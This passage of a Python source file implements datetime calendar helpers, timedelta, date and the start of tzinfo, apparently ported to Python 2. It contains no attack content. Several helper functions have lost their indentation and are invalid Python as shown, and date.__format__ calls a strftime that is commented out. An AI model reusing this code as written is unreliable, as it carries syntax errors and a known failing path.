# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
# Days per month in a non-leap year; index 0 is a dummy so 1-based month
# numbers index directly.
_DAYS_IN_MONTH = [-1, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]

# _DAYS_BEFORE_MONTH[m] = days in a non-leap year before month m (dummy at 0).
_DAYS_BEFORE_MONTH = [-1]
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
    _DAYS_BEFORE_MONTH.append(dbm)
    dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
    """year, month -> number of days in that month in that year."""
    assert 1 <= month <= 12, month
    if month == 2:
        # February is the only month whose length depends on the year.
        return 29 if _is_leap(year) else 28
    return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
    """year, month -> number of days in year preceding first of month."""
    assert 1 <= month <= 12, 'month must be in 1..12'
    days = _DAYS_BEFORE_MONTH[month]
    # Past February, a leap year contributes one extra day.
    if month > 2 and _is_leap(year):
        days += 1
    return days
def _ymd2ord(year, month, day):
    """year, month, day -> ordinal, considering 01-Jan-0001 as day 1."""
    assert 1 <= month <= 12, 'month must be in 1..12'
    dim = _days_in_month(year, month)
    assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
    # Days in all prior years + days in prior months of this year + day.
    return _days_before_year(year) + _days_before_month(year, month) + day
_DI400Y = _days_before_year(401)    # number of days in 400 years
_DI100Y = _days_before_year(101)    #    "    "   "   " 100   "
_DI4Y = _days_before_year(5)        #    "    "   "   "   4   "

# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1

# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1

# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1

# Conversion factors to microseconds, used by timedelta's constructor.
_US_PER_US = 1
_US_PER_MS = 1000
_US_PER_SECOND = 1000000
_US_PER_MINUTE = 60000000
_SECONDS_PER_DAY = 24 * 3600
_US_PER_HOUR = 3600000000
_US_PER_DAY = 86400000000
_US_PER_WEEK = 604800000000
def _ord2ymd(n):
    "ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."

    # n is a 1-based index, starting at 1-Jan-1.  The pattern of leap years
    # repeats exactly every 400 years.  The basic strategy is to find the
    # closest 400-year boundary at or before n, then work with the offset
    # from that boundary to n.  Life is much clearer if we subtract 1 from
    # n first -- then the values of n at 400-year boundaries are exactly
    # those divisible by _DI400Y:
    #
    #     D  M   Y            n              n-1
    #     -- --- ----        ----------     ----------------
    #     31 Dec -400        -_DI400Y       -_DI400Y -1
    #      1 Jan -399         -_DI400Y +1   -_DI400Y      400-year boundary
    #     ...
    #     30 Dec  000        -1             -2
    #     31 Dec  000         0             -1
    #      1 Jan  001         1              0            400-year boundary
    #      2 Jan  001         2              1
    #      3 Jan  001         3              2
    #     ...
    #     31 Dec  400         _DI400Y        _DI400Y -1
    #      1 Jan  401         _DI400Y +1     _DI400Y      400-year boundary
    n -= 1
    n400, n = divmod(n, _DI400Y)
    year = n400 * 400 + 1   # ..., -399, 1, 401, ...

    # Now n is the (non-negative) offset, in days, from January 1 of year, to
    # the desired date.  Now compute how many 100-year cycles precede n.
    # Note that it's possible for n100 to equal 4!  In that case 4 full
    # 100-year cycles precede the desired day, which implies the desired
    # day is December 31 at the end of a 400-year cycle.
    n100, n = divmod(n, _DI100Y)

    # Now compute how many 4-year cycles precede it.
    n4, n = divmod(n, _DI4Y)

    # And now how many single years.  Again n1 can be 4, and again meaning
    # that the desired day is December 31 at the end of the 4-year cycle.
    n1, n = divmod(n, 365)

    year += n100 * 100 + n4 * 4 + n1
    if n1 == 4 or n100 == 4:
        # Dec 31 of a leap year at the end of a 4- or 400-year cycle.
        assert n == 0
        return year-1, 12, 31

    # Now the year is correct, and n is the offset from January 1.  We find
    # the month via an estimate that's either exact or one too large.
    leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
    assert leapyear == _is_leap(year)
    # (n + 50) >> 5 approximates n/30.6, giving the month or month+1.
    month = (n + 50) >> 5
    preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
    if preceding > n:  # estimate is too large
        month -= 1
        preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
    n -= preceding
    assert 0 <= n < _days_in_month(year, month)

    # Now the year and month are correct, and n is the offset from the
    # start of that month:  we're done!
    return year, month, n+1
# Month and day names.  For localized versions, see the calendar module.
# Index 0 is a dummy so 1-based month/ISO-weekday numbers index directly.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
               "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
    """Assemble a time.struct_time from broken-out date/time fields."""
    weekday = (_ymd2ord(y, m, d) + 6) % 7   # 0 = Monday (1-Jan-1 was a Monday)
    yearday = _days_before_month(y, m) + d  # 1-based day of the year
    return _time.struct_time((y, m, d, hh, mm, ss, weekday, yearday, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
# def _wrap_strftime(object, format, timetuple):
# year = timetuple[0]
# if year < _MINYEARFMT:
# raise ValueError("year=%d is before %d; the datetime strftime() "
# "methods require year >= %d" %
# (year, _MINYEARFMT, _MINYEARFMT))
# # Don't call utcoffset() or tzname() unless actually needed.
# freplace = None # the string to use for %f
# zreplace = None # the string to use for %z
# Zreplace = None # the string to use for %Z
# # Scan format for %z and %Z escapes, replacing as needed.
# newformat = []
# push = newformat.append
# i, n = 0, len(format)
# while i < n:
# ch = format[i]
# i += 1
# if ch == '%':
# if i < n:
# ch = format[i]
# i += 1
# if ch == 'f':
# if freplace is None:
# freplace = '%06d' % getattr(object,
# 'microsecond', 0)
# newformat.append(freplace)
# elif ch == 'z':
# if zreplace is None:
# zreplace = ""
# if hasattr(object, "_utcoffset"):
# offset = object._utcoffset()
# if offset is not None:
# sign = '+'
# if offset < 0:
# offset = -offset
# sign = '-'
# h, m = divmod(offset, 60)
# zreplace = '%c%02d%02d' % (sign, h, m)
# assert '%' not in zreplace
# newformat.append(zreplace)
# elif ch == 'Z':
# if Zreplace is None:
# Zreplace = ""
# if hasattr(object, "tzname"):
# s = object.tzname()
# if s is not None:
# # strftime is going to have at this: escape %
# Zreplace = s.replace('%', '%%')
# newformat.append(Zreplace)
# else:
# push('%')
# push(ch)
# else:
# push('%')
# else:
# push(ch)
# newformat = "".join(newformat)
# return _time.strftime(newformat, timetuple)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
    """Validate a tzinfo utcoffset()/dst() result.

    offset must be None (returned unchanged) or a timedelta that is a
    whole number of minutes with magnitude < 1 day; returns the offset
    converted to an int count of minutes.  Raises TypeError for wrong
    types and ValueError for out-of-range or fractional-minute offsets.
    """
    assert name in ("utcoffset", "dst")
    if offset is None:
        return
    if not isinstance(offset, timedelta):
        raise TypeError("tzinfo.%s() must return None "
                        "or timedelta, not '%s'" % (name, type(offset)))
    days = offset.days
    # Valid offsets normalize to days == -1 (negative offset) or 0.
    if days < -1 or days > 0:
        offset = 1440  # trigger out-of-range
    else:
        seconds = days * 86400 + offset.seconds
        minutes, seconds = divmod(seconds, 60)
        if seconds or offset.microseconds:
            raise ValueError("tzinfo.%s() must return a whole number "
                             "of minutes" % name)
        offset = minutes
    if not -1440 < offset < 1440:
        raise ValueError("%s()=%d, must be in -1439..1439" % (name, offset))
    return offset
def _check_int_field(value):
    """Coerce value to an int or raise TypeError.

    ints pass through; floats are rejected outright; any other type is
    converted via its __int__() method if present.  The `long` branch is
    Python 2 only (this is a Python 2 port; `long` would NameError on 3).
    """
    if isinstance(value, int):
        return int(value)
    if not isinstance(value, float):
        try:
            value = value.__int__()
        except AttributeError:
            pass
        else:
            if isinstance(value, int):
                return int(value)
            elif isinstance(value, long):  # Python 2 builtin
                return int(long(value))
            raise TypeError('__int__ method should return an integer')
        raise TypeError('an integer is required')
    raise TypeError('integer argument expected, got float')
def _check_date_fields(year, month, day):
    """Coerce year/month/day to ints, range-check, and return them."""
    year, month, day = (_check_int_field(v) for v in (year, month, day))
    if not MINYEAR <= year <= MAXYEAR:
        raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
    if not 1 <= month <= 12:
        raise ValueError('month must be in 1..12', month)
    # Day range depends on the (already validated) month and year.
    dim = _days_in_month(year, month)
    if not 1 <= day <= dim:
        raise ValueError('day must be in 1..%d' % dim, day)
    return year, month, day
def _check_time_fields(hour, minute, second, microsecond):
    """Coerce time components to ints, range-check, and return them."""
    hour = _check_int_field(hour)
    minute = _check_int_field(minute)
    second = _check_int_field(second)
    microsecond = _check_int_field(microsecond)
    for value, label, hi in ((hour, 'hour', 23),
                             (minute, 'minute', 59),
                             (second, 'second', 59),
                             (microsecond, 'microsecond', 999999)):
        if not 0 <= value <= hi:
            raise ValueError('%s must be in 0..%d' % (label, hi), value)
    return hour, minute, second, microsecond
def _check_tzinfo_arg(tz):
    """Reject tz values that are neither None nor a tzinfo instance."""
    if tz is None or isinstance(tz, tzinfo):
        return
    raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
# Notes on comparison: In general, datetime module comparison operators raise
# TypeError when they don't know how to do a comparison themself. If they
# returned NotImplemented instead, comparison could (silently) fall back to
# the default compare-objects-by-comparing-their-memory-addresses strategy,
# and that's not helpful. There are two exceptions:
#
# 1. For date and datetime, if the other object has a "timetuple" attr,
# NotImplemented is returned. This is a hook to allow other kinds of
# datetime-like objects a chance to intercept the comparison.
#
# 2. Else __eq__ and __ne__ return False and True, respectively. This is
# so opertaions like
#
# x == y
# x != y
# x in sequence
# x not in sequence
# dict[x] = y
#
# don't raise annoying TypeErrors just because a datetime object
# is part of a heterogeneous collection. If there's no known way to
# compare X to a datetime, saying they're not equal is reasonable.
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
def _normalize_pair(hi, lo, factor):
if not 0 <= lo <= factor-1:
inc, lo = divmod(lo, factor)
hi += inc
return hi, lo
def _normalize_datetime(y, m, d, hh, mm, ss, us, ignore_overflow=False):
    """Carry out-of-range time fields upward, then normalize the date.

    The carries must run smallest-to-largest unit so each overflow
    propagates into the next field before that field is normalized.
    """
    # Normalize all the inputs, and store the normalized values.
    ss, us = _normalize_pair(ss, us, 1000000)  # microseconds -> seconds
    mm, ss = _normalize_pair(mm, ss, 60)       # seconds -> minutes
    hh, mm = _normalize_pair(hh, mm, 60)       # minutes -> hours
    d, hh = _normalize_pair(d, hh, 24)         # hours -> days
    y, m, d = _normalize_date(y, m, d, ignore_overflow)
    return y, m, d, hh, mm, ss, us
def _normalize_date(year, month, day, ignore_overflow=False):
    """Normalize an arbitrary (year, month, day) to a real calendar date.

    Raises OverflowError if the result leaves MINYEAR..MAXYEAR, unless
    ignore_overflow is true.
    """
    # That was easy.  Now it gets muddy:  the proper range for day
    # can't be determined without knowing the correct month and year,
    # but if day is, e.g., plus or minus a million, the current month
    # and year values make no sense (and may also be out of bounds
    # themselves).
    # Saying 12 months == 1 year should be non-controversial.
    if not 1 <= month <= 12:
        year, month = _normalize_pair(year, month-1, 12)
        month += 1
        assert 1 <= month <= 12

    # Now only day can be out of bounds (year may also be out of bounds
    # for a datetime object, but we don't care about that here).
    # If day is out of bounds, what to do is arguable, but at least the
    # method here is principled and explainable.
    dim = _days_in_month(year, month)
    if not 1 <= day <= dim:
        # Move day-1 days from the first of the month.  First try to
        # get off cheap if we're only one day out of range (adjustments
        # for timezone alone can't be worse than that).
        if day == 0:    # move back a day
            month -= 1
            if month > 0:
                day = _days_in_month(year, month)
            else:
                year, month, day = year-1, 12, 31
        elif day == dim + 1:    # move forward a day
            month += 1
            day = 1
            if month > 12:
                month = 1
                year += 1
        else:
            # General case: convert to an ordinal and back.
            ordinal = _ymd2ord(year, month, 1) + (day - 1)
            year, month, day = _ord2ymd(ordinal)

    if not ignore_overflow and not MINYEAR <= year <= MAXYEAR:
        raise OverflowError("date value out of range")
    return year, month, day
def _accum(tag, sofar, num, factor, leftover):
    """Fold num*factor microseconds into the running (sofar, leftover) pair.

    sofar accumulates whole microseconds; leftover accumulates the
    fractional microseconds contributed by float arguments.  tag names
    the timedelta keyword, for error messages.  Returns the new pair.
    (`long` is the Python 2 builtin; this module is a Python 2 port.)
    """
    if isinstance(num, (int, long)):
        prod = num * factor
        rsum = sofar + prod
        return rsum, leftover
    if isinstance(num, float):
        # Split num so the integral part is scaled exactly and only the
        # fraction goes through float arithmetic.
        fracpart, intpart = _math.modf(num)
        prod = int(intpart) * factor
        rsum = sofar + prod
        if fracpart == 0.0:
            return rsum, leftover
        assert isinstance(factor, (int, long))
        fracpart, intpart = _math.modf(factor * fracpart)
        rsum += int(intpart)
        return rsum, leftover + fracpart
    raise TypeError("unsupported type for timedelta %s component: %s" %
                    (tag, type(num)))
class timedelta(object):
    """Represent the difference between two datetime objects.

    Supported operators:

    - add, subtract timedelta
    - unary plus, minus, abs
    - compare to timedelta
    - multiply, divide by int/long

    In addition, datetime supports subtraction of two datetime objects
    returning a timedelta, and addition or subtraction of a datetime
    and a timedelta giving a datetime.

    Representation: (days, seconds, microseconds), normalized so that
    0 <= seconds < 24*3600 and 0 <= microseconds < 10**6.
    """
    # _hashcode caches hash(); -1 means "not computed yet".
    __slots__ = '_days', '_seconds', '_microseconds', '_hashcode'

    def __new__(cls, days=_SENTINEL, seconds=_SENTINEL, microseconds=_SENTINEL,
                milliseconds=_SENTINEL, minutes=_SENTINEL, hours=_SENTINEL, weeks=_SENTINEL):
        # Fold every supplied unit into one exact microsecond count `x`,
        # carrying fractional float contributions in `leftover`, which is
        # rounded (half away from zero) only once at the end.
        x = 0
        leftover = 0.0
        if microseconds is not _SENTINEL:
            x, leftover = _accum("microseconds", x, microseconds, _US_PER_US, leftover)
        if milliseconds is not _SENTINEL:
            x, leftover = _accum("milliseconds", x, milliseconds, _US_PER_MS, leftover)
        if seconds is not _SENTINEL:
            x, leftover = _accum("seconds", x, seconds, _US_PER_SECOND, leftover)
        if minutes is not _SENTINEL:
            x, leftover = _accum("minutes", x, minutes, _US_PER_MINUTE, leftover)
        if hours is not _SENTINEL:
            x, leftover = _accum("hours", x, hours, _US_PER_HOUR, leftover)
        if days is not _SENTINEL:
            x, leftover = _accum("days", x, days, _US_PER_DAY, leftover)
        if weeks is not _SENTINEL:
            x, leftover = _accum("weeks", x, weeks, _US_PER_WEEK, leftover)
        if leftover != 0.0:
            x += _round(leftover)
        return cls._from_microseconds(x)

    @classmethod
    def _from_microseconds(cls, us):
        # Split a total microsecond count into (days, seconds, microseconds).
        s, us = divmod(us, _US_PER_SECOND)
        d, s = divmod(s, _SECONDS_PER_DAY)
        return cls._create(d, s, us, False)

    @classmethod
    def _create(cls, d, s, us, normalize):
        """Build an instance directly from the three fields.

        When normalize is true, carries are propagated so the stored
        fields satisfy the class invariants.
        """
        if normalize:
            s, us = _normalize_pair(s, us, 1000000)
            d, s = _normalize_pair(d, s, 24*3600)

        if not -_MAX_DELTA_DAYS <= d <= _MAX_DELTA_DAYS:
            raise OverflowError("days=%d; must have magnitude <= %d" % (d, _MAX_DELTA_DAYS))

        self = object.__new__(cls)
        self._days = d
        self._seconds = s
        self._microseconds = us
        self._hashcode = -1
        return self

    def _to_microseconds(self):
        # Exact total of the delta expressed in microseconds.
        return ((self._days * _SECONDS_PER_DAY + self._seconds) * _US_PER_SECOND +
                self._microseconds)

    def __repr__(self):
        # Prefix with "datetime." only for the base class, not subclasses.
        module = "datetime." if self.__class__ is timedelta else ""
        if self._microseconds:
            return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
                                       self._days,
                                       self._seconds,
                                       self._microseconds)
        if self._seconds:
            return "%s(%d, %d)" % (module + self.__class__.__name__,
                                   self._days,
                                   self._seconds)
        return "%s(%d)" % (module + self.__class__.__name__, self._days)

    def __str__(self):
        # "[D day[s], ]H:MM:SS[.ffffff]"
        mm, ss = divmod(self._seconds, 60)
        hh, mm = divmod(mm, 60)
        s = "%d:%02d:%02d" % (hh, mm, ss)
        if self._days:
            def plural(n):
                return n, abs(n) != 1 and "s" or ""
            s = ("%d day%s, " % plural(self._days)) + s
        if self._microseconds:
            s = s + ".%06d" % self._microseconds
        return s

    def total_seconds(self):
        """Total seconds in the duration, as a float."""
        # return self._to_microseconds() / 10**6
        return float(self._to_microseconds()) / float(10**6)

    # Read-only field accessors
    @property
    def days(self):
        """days"""
        return self._days

    @property
    def seconds(self):
        """seconds"""
        return self._seconds

    @property
    def microseconds(self):
        """microseconds"""
        return self._microseconds

    def __add__(self, other):
        if isinstance(other, timedelta):
            # for CPython compatibility, we cannot use
            # our __class__ here, but need a real timedelta
            return timedelta._create(self._days + other._days,
                                     self._seconds + other._seconds,
                                     self._microseconds + other._microseconds,
                                     True)
        return NotImplemented

    def __sub__(self, other):
        if isinstance(other, timedelta):
            # for CPython compatibility, we cannot use
            # our __class__ here, but need a real timedelta
            return timedelta._create(self._days - other._days,
                                     self._seconds - other._seconds,
                                     self._microseconds - other._microseconds,
                                     True)
        return NotImplemented

    def __neg__(self):
        # for CPython compatibility, we cannot use
        # our __class__ here, but need a real timedelta
        return timedelta._create(-self._days,
                                 -self._seconds,
                                 -self._microseconds,
                                 True)

    def __pos__(self):
        # for CPython compatibility, we cannot use
        # our __class__ here, but need a real timedelta
        return timedelta._create(self._days,
                                 self._seconds,
                                 self._microseconds,
                                 False)

    def __abs__(self):
        # Normalization keeps only _days negative for negative deltas.
        if self._days < 0:
            return -self
        else:
            return self

    def __mul__(self, other):
        if not isinstance(other, (int, long)):  # Python 2: `long` exists
            return NotImplemented
        usec = self._to_microseconds()
        return timedelta._from_microseconds(usec * other)

    __rmul__ = __mul__

    def __div__(self, other):
        # Python 2 classic-division entry point (also used as __floordiv__).
        if not isinstance(other, (int, long)):
            return NotImplemented
        usec = self._to_microseconds()
        # return timedelta._from_microseconds(usec // other)
        return timedelta._from_microseconds(int(usec) / int(other))

    __floordiv__ = __div__

    # Comparisons of timedelta objects with other.
    def __eq__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) == 0
        else:
            return False

    def __ne__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) != 0
        else:
            return True

    def __le__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) <= 0
        else:
            _cmperror(self, other)

    def __lt__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) < 0
        else:
            _cmperror(self, other)

    def __ge__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) >= 0
        else:
            _cmperror(self, other)

    def __gt__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) > 0
        else:
            _cmperror(self, other)

    def _cmp(self, other):
        # Normalized field tuples compare correctly lexicographically.
        assert isinstance(other, timedelta)
        return _cmp(self._getstate(), other._getstate())

    def __hash__(self):
        if self._hashcode == -1:
            self._hashcode = hash(self._getstate())
        return self._hashcode

    def __nonzero__(self):
        # Python 2 truth hook (Python 3 would use __bool__).
        return (self._days != 0 or
                self._seconds != 0 or
                self._microseconds != 0)

    # Pickle support.
    def _getstate(self):
        return (self._days, self._seconds, self._microseconds)

    def __reduce__(self):
        return (self.__class__, self._getstate())

# Extreme values and the smallest representable difference.
timedelta.min = timedelta(-_MAX_DELTA_DAYS)
timedelta.max = timedelta(_MAX_DELTA_DAYS, 24*3600-1, 1000000-1)
timedelta.resolution = timedelta(microseconds=1)
class date(object):
    """Concrete date type.

    Constructors:

    __new__()
    fromtimestamp()
    today()
    fromordinal()

    Operators:

    __repr__, __str__
    __cmp__, __hash__
    __add__, __radd__, __sub__ (add/radd only with timedelta arg)

    Methods:

    timetuple()
    toordinal()
    weekday()
    isoweekday(), isocalendar(), isoformat()
    ctime()
    strftime()

    Properties (readonly):
    year, month, day
    """
    # _hashcode caches hash(); -1 means "not computed yet".
    __slots__ = '_year', '_month', '_day', '_hashcode'

    def __new__(cls, year, month=None, day=None):
        """Constructor.

        Arguments:

        year, month, day (required, base 1)
        """
        # (Pickle-support fast path via a packed 4-byte string is disabled
        # in this port.)
        # if month is None and isinstance(year, bytes) and len(year) == 4 and \
        #                 1 <= ord(year[2]) <= 12:
        #     # Pickle support
        #     self = object.__new__(cls)
        #     self.__setstate(year)
        #     self._hashcode = -1
        #     return self
        year, month, day = _check_date_fields(year, month, day)
        self = object.__new__(cls)
        self._year = year
        self._month = month
        self._day = day
        self._hashcode = -1
        return self

    # Additional constructors

    @classmethod
    def fromtimestamp(cls, t):
        "Construct a date from a POSIX timestamp (like time.time())."
        y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
        return cls(y, m, d)

    @classmethod
    def today(cls):
        "Construct a date from time.time()."
        t = _time.time()
        return cls.fromtimestamp(t)

    @classmethod
    def fromordinal(cls, n):
        """Contruct a date from a proleptic Gregorian ordinal.

        January 1 of year 1 is day 1.  Only the year, month and day are
        non-zero in the result.
        """
        y, m, d = _ord2ymd(n)
        return cls(y, m, d)

    # Conversions to string

    def __repr__(self):
        """Convert to formal string, for repr().

        Example: repr(date(2010, 1, 1)) == 'datetime.date(2010, 1, 1)'.
        The "datetime." prefix is used only for the base class.
        """
        module = "datetime." if self.__class__ is date else ""
        return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
                                   self._year,
                                   self._month,
                                   self._day)

    # XXX These shouldn't depend on time.localtime(), because that
    # clips the usable dates to [1970 .. 2038).  At least ctime() is
    # easily done without using strftime() -- that's better too because
    # strftime("%c", ...) is locale specific.

    def ctime(self):
        "Return ctime() style string."
        weekday = self.toordinal() % 7 or 7
        return "%s %s %2d 00:00:00 %04d" % (
            _DAYNAMES[weekday],
            _MONTHNAMES[self._month],
            self._day, self._year)

    # def strftime(self, format):
    #     "Format using strftime()."
    #     return _wrap_strftime(self, format, self.timetuple())

    def __format__(self, fmt):
        # NOTE(review): strftime() is commented out above, so a nonempty
        # fmt will raise AttributeError here -- confirm this is intended.
        # (`unicode` is the Python 2 builtin.)
        if not isinstance(fmt, (str, unicode)):
            raise ValueError("__format__ expects str or unicode, not %s" %
                             fmt.__class__.__name__)
        if len(fmt) != 0:
            return self.strftime(fmt)
        return str(self)

    def isoformat(self):
        """Return the date formatted according to ISO.

        This is 'YYYY-MM-DD'.

        References:
        - http://www.w3.org/TR/NOTE-datetime
        - http://www.cl.cam.ac.uk/~mgk25/iso-time.html
        """
        # return "%04d-%02d-%02d" % (self._year, self._month, self._day)
        return "%s-%s-%s" % (str(self._year).zfill(4), str(self._month).zfill(2), str(self._day).zfill(2))

    __str__ = isoformat

    # Read-only field accessors
    @property
    def year(self):
        """year (1-9999)"""
        return self._year

    @property
    def month(self):
        """month (1-12)"""
        return self._month

    @property
    def day(self):
        """day (1-31)"""
        return self._day

    # Standard conversions, __cmp__, __hash__ (and helpers)

    def timetuple(self):
        "Return local time tuple compatible with time.localtime()."
        return _build_struct_time(self._year, self._month, self._day,
                                  0, 0, 0, -1)

    def toordinal(self):
        """Return proleptic Gregorian ordinal for the year, month and day.

        January 1 of year 1 is day 1.  Only the year, month and day values
        contribute to the result.
        """
        return _ymd2ord(self._year, self._month, self._day)

    def replace(self, year=None, month=None, day=None):
        """Return a new date with new values for the specified fields."""
        if year is None:
            year = self._year
        if month is None:
            month = self._month
        if day is None:
            day = self._day
        return date.__new__(type(self), year, month, day)

    # Comparisons of date objects with other.
    # Objects exposing a "timetuple" attribute get a chance to intercept
    # the comparison via NotImplemented (see module comment above).

    def __eq__(self, other):
        if isinstance(other, date):
            return self._cmp(other) == 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            return False

    def __ne__(self, other):
        if isinstance(other, date):
            return self._cmp(other) != 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            return True

    def __le__(self, other):
        if isinstance(other, date):
            return self._cmp(other) <= 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            _cmperror(self, other)

    def __lt__(self, other):
        if isinstance(other, date):
            return self._cmp(other) < 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            _cmperror(self, other)

    def __ge__(self, other):
        if isinstance(other, date):
            return self._cmp(other) >= 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            _cmperror(self, other)

    def __gt__(self, other):
        if isinstance(other, date):
            return self._cmp(other) > 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            _cmperror(self, other)

    def _cmp(self, other):
        assert isinstance(other, date)
        y, m, d = self._year, self._month, self._day
        y2, m2, d2 = other._year, other._month, other._day
        return _cmp((y, m, d), (y2, m2, d2))

    def __hash__(self):
        "Hash."
        if self._hashcode == -1:
            self._hashcode = hash(self._getstate())
        return self._hashcode

    # Computations

    def _add_timedelta(self, other, factor):
        # Shared implementation of date +/- timedelta; factor is +1 or -1.
        y, m, d = _normalize_date(
            self._year,
            self._month,
            self._day + other.days * factor)
        return date(y, m, d)

    def __add__(self, other):
        "Add a date to a timedelta."
        if isinstance(other, timedelta):
            return self._add_timedelta(other, 1)
        return NotImplemented

    __radd__ = __add__

    def __sub__(self, other):
        """Subtract two dates, or a date and a timedelta."""
        if isinstance(other, date):
            days1 = self.toordinal()
            days2 = other.toordinal()
            return timedelta._create(days1 - days2, 0, 0, False)
        if isinstance(other, timedelta):
            return self._add_timedelta(other, -1)
        return NotImplemented

    def weekday(self):
        "Return day of the week, where Monday == 0 ... Sunday == 6."
        return (self.toordinal() + 6) % 7

    # Day-of-the-week and week-of-the-year, according to ISO

    def isoweekday(self):
        "Return day of the week, where Monday == 1 ... Sunday == 7."
        # 1-Jan-0001 is a Monday
        return self.toordinal() % 7 or 7

    def isocalendar(self):
        """Return a 3-tuple containing ISO year, week number, and weekday.

        The first ISO week of the year is the (Mon-Sun) week
        containing the year's first Thursday; everything else derives
        from that.

        The first week is 1; Monday is 1 ... Sunday is 7.

        ISO calendar algorithm taken from
        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
        """
        year = self._year
        week1monday = _isoweek1monday(year)
        today = _ymd2ord(self._year, self._month, self._day)
        # Internally, week and day have origin 0
        week, day = divmod(today - week1monday, 7)
        if week < 0:
            # Date falls in the last ISO week of the previous year.
            year -= 1
            week1monday = _isoweek1monday(year)
            week, day = divmod(today - week1monday, 7)
        elif week >= 52:
            # Possibly the first ISO week of the next year.
            if today >= _isoweek1monday(year+1):
                year += 1
                week = 0
        return year, week+1, day+1

    # Pickle support.

    def _getstate(self):
        # Encode as 4 bytes: year hi, year lo, month, day.
        yhi, ylo = divmod(self._year, 256)
        return (_struct.pack('4B', yhi, ylo, self._month, self._day),)

    def __setstate(self, string):
        yhi, ylo, self._month, self._day = (ord(string[0]), ord(string[1]),
                                            ord(string[2]), ord(string[3]))
        self._year = yhi * 256 + ylo

    def __reduce__(self):
        return (self.__class__, self._getstate())

_date_class = date  # so functions w/ args named "date" can get at the class

date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo(object):
    """Abstract base class for time zone info classes.

    Subclasses must override the tzname(), utcoffset() and dst() methods.
    """
    __slots__ = ()

    def tzname(self, dt):
        "datetime -> string name of time zone."
        raise NotImplementedError("tzinfo subclass must override tzname()")

    def utcoffset(self, dt):
        "datetime -> minutes east of UTC (negative for west of UTC)"
        raise NotImplementedError("tzinfo subclass must override utcoffset()")

    def dst(self, dt):
        """datetime -> DST offset in minutes east of UTC.

        Return 0 if DST not in effect.  utcoffset() must include the DST
        offset.
        """
        raise NotImplementedError("tzinfo subclass must override dst()")

    def fromutc(self, dt):
        "datetime in UTC -> datetime in local time."

        if not isinstance(dt, datetime):
            raise TypeError("fromutc() requires a datetime argument")
        if dt.tzinfo is not self:
            raise ValueError("dt.tzinfo is not self")

        dtoff = dt.utcoffset()
        if dtoff is None:
            raise ValueError("fromutc() requires a non-None utcoffset() "
                             "result")

        # See the long comment block at the end of this file for an
        # explanation of this algorithm.
        dtdst = dt.dst()
        if dtdst is None:
            raise ValueError("fromutc() requires a non-None dst() result")
        delta = dtoff - dtdst
        if delta:
            # Shift to standard time, then re-evaluate DST there.
            dt += delta
            dtdst = dt.dst()
            if dtdst is None:
                raise ValueError("fromutc(): dt.dst gave inconsistent "
                                 "results; cannot convert")
        if dtdst:
            return dt + dtdst
        else:
            return dt

    # Pickle support.

    def __reduce__(self):
        # Honor __getinitargs__/__getstate__ if the subclass defines them.
        getinitargs = getattr(self, "__getinitargs__", None)
        if getinitargs:
            args = getinitargs()
        else:
            args = ()
        getstate = getattr(self, "__getstate__", None)
        if getstate:
            state = getstate()
        else:
            state = getattr(self, "__dict__", None) or None
